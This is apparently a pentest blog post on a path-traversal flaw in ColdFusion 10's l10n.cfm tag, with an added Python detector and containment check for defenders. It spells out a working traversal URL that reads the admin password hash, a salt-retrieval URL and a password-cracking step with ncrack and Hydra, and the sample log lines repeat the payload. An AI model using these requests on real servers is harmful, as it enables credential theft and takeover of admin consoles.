ColdFusion has had several exploits in the past. With ColdFusion 10 being the latest stable release from Adobe, it was hard to find any ready exploits.
As part of an external pentest, I had no information about the infrastructure in use, the platform, or the installed applications. I ran Nessus as the first part of the network pentest and found that a ColdFusion admin login page exists here:
http://XX.XX.XX.XX/CFIDE/administrator/index.cfm
The next step is to get the version number. I got this through social engineering techniques. :)
Interestingly, ColdFusion 10 no longer displays its version number on the homepage, unlike previous versions. You have to assume it or obtain it by other means.
The Exploit
The exploit works if ColdFusion has not been updated with the latest patches and hotfixes, i.e. it is a raw installation. The Remote File Disclosure (RFD) gives access to operating system files, configuration files and logs, lets you browse complete server folders, and exposes the CF admin password hash.
The vulnerability exists in the l10n.cfm custom tag: the attributes.file parameter is not validated for path traversal. This is pretty basic; how could Adobe miss this!!!
Vulnerable URL:
http://XX.XX.XX.XX/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../coldfusion10/cfusion/lib/password.properties
Notes for successful exploitation:
You will need a couple of ../../ sequences before you get to the password hash.
You will need to guess the ColdFusion home directory name.
You might need some knowledge of the ColdFusion folder structure. Refer to it here.
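To make the missing check concrete from the defender's side, here is an added example (not code from the original post or from Adobe): a path-containment check of the kind the post says attributes.file lacks, plus a small detector that flags traversal attempts against /CFIDE/adminapi/ in web-server access logs. The base directory, the log format (Apache common log) and the log lines themselves are constructed for this example.

```python
"""Added example, not from the original post or from ColdFusion itself.

Two defensive pieces around the l10n.cfm path-traversal issue:
  1. resolve_within(): the containment check that a file parameter should pass
     before it is used to read a file.
  2. scan_access_log(): flags requests to /CFIDE/adminapi/ whose file-related
     parameters contain '..' (plain or percent-encoded), for use in detection.
All paths and log lines below are constructed sample data.
"""
import posixpath
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical install path used only for the example.
CUSTOMTAGS_DIR = "/opt/coldfusion10/cfusion/wwwroot/CFIDE/adminapi/customtags"


def resolve_within(base_dir: str, requested: str) -> Optional[str]:
    """Return the normalized path if `requested` stays inside `base_dir`, else None.

    This is the validation the post says attributes.file is missing: the value
    is percent-decoded, joined to the base, normalized (which collapses '..'),
    and only accepted if the result is still under the base directory.
    """
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, unquote(requested).lstrip("/")))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


# A '..' path component, anchored at a slash or at either end of the string.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# Parameters from the post's vulnerable URL that carry file paths.
SENSITIVE_PARAMS = ("attributes.file", "filename")


def flag_request(target: str) -> Optional[dict]:
    """Inspect one request target (path + query); return a finding or None."""
    url = urlsplit(target)
    if not url.path.lower().startswith("/cfide/adminapi/"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %xx once
    hits = {}
    for name in SENSITIVE_PARAMS:
        for value in params.get(name, []):
            decoded = unquote(value)  # second decode catches double encoding
            if TRAVERSAL.search(decoded):
                hits[name] = decoded
    return {"path": url.path, "params": hits} if hits else None


# Apache common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def scan_access_log(lines) -> list:
    """Return one finding per log line that carries a traversal attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = flag_request(m.group("target"))
        if finding:
            findings.append(
                {"ip": m.group("ip"), "time": m.group("ts"),
                 "status": int(m.group("status")), **finding}
            )
    return findings


# Constructed sample log: a normal admin-page hit, the traversal pattern from the
# post, the same pattern percent-encoded, and a benign l10n.cfm request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2013:10:00:01 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jan/2013:10:00:09 +0000] "GET /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../lib/password.properties HTTP/1.1" 200 2201',
    '198.51.100.4 - - [10/Jan/2013:10:01:30 +0000] "GET /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=%2e%2e%2f%2e%2e%2fadministrator%2fmail%2fdownload.cfm HTTP/1.1" 200 2201',
    '198.51.100.4 - - [10/Jan/2013:10:02:00 +0000] "GET /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=it.cfm HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    print(resolve_within(CUSTOMTAGS_DIR, "../../administrator/mail/download.cfm"))  # None: escapes base
    print(resolve_within(CUSTOMTAGS_DIR, "it.cfm"))  # accepted, inside base
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} {f['params']}")
```

A 200 status on a flagged line is the signal worth paging on: it means the traversal was served rather than rejected. Normalizing before the containment check matters because comparing the raw string against a blacklist of "../" misses the percent-encoded variant shown in the third log line.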
Once you have access to the password hash, the next step is to get the salt so you can perform rainbow table attacks.
Here's a quick reference for you on CF sensitive files. You might want to access those too.
Password Hash URL:
http://XX.XX.XX.XX/CFIDE/adminapi/administrator.cfc?method=getSalt
With all this information, you can now proceed to password cracking. I used ncrack and Hydra for password cracking, and it worked pretty quickly as the admin password was among the common passwords.
Happy Exploiting CF 10!!!